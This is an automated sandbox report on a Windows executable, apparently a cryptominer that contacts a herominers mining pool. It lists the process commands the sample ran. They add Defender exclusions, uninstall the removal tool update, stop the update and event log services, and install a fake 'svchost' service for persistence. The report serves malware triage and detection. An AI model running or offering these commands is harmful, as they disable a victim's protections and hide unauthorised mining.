Malware Analysis Report

2025-03-14 22:29

Sample ID 240407-2d8qssgd2z
Target zephyr 100.exe
SHA256 0d7852074aa6b39aa9063384632245092679978969a229f4a97fc8d5bb109ee8
Tags
evasion persistence
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

0d7852074aa6b39aa9063384632245092679978969a229f4a97fc8d5bb109ee8

Threat Level: Likely malicious

The file zephyr 100.exe was found to be: Likely malicious.

Malicious Activity Summary

evasion persistence

Creates new service(s)

Stops running service(s)

Launches sc.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-07 22:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-07 22:29

Reported

2024-04-07 23:02

Platform

win10-20240319-en

Max time kernel

33s

Max time network

44s

Command Line

"C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe"

Signatures

Creates new service(s)

persistence

Stops running service(s)

evasion

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe

"C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "svchost"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "svchost" binpath= "C:\ProgramData\RunDLL\taskhostw.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "svchost"

C:\ProgramData\RunDLL\taskhostw.exe

C:\ProgramData\RunDLL\taskhostw.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\dialer.exe

dialer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ru.zephyr.herominers.com udp
FI 37.27.63.72:1123 ru.zephyr.herominers.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zotnjry0.yxf.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\ProgramData\RunDLL\taskhostw.exe

MD5 af3706e699c90f1b5e1fdb5201e6d8ec
SHA1 2c219b9b3c90140d5e9361b1fa61130ca6dda281
SHA256 0d7852074aa6b39aa9063384632245092679978969a229f4a97fc8d5bb109ee8
SHA512 1bfb95adc9aa0a3ac340cda9608bdc0c824fd82f61b63929c4dfaabe290b0cd8ffa05fd51886dd46a05a6603eebeb9f2a54c9eb3df146fda83f8720ce286789e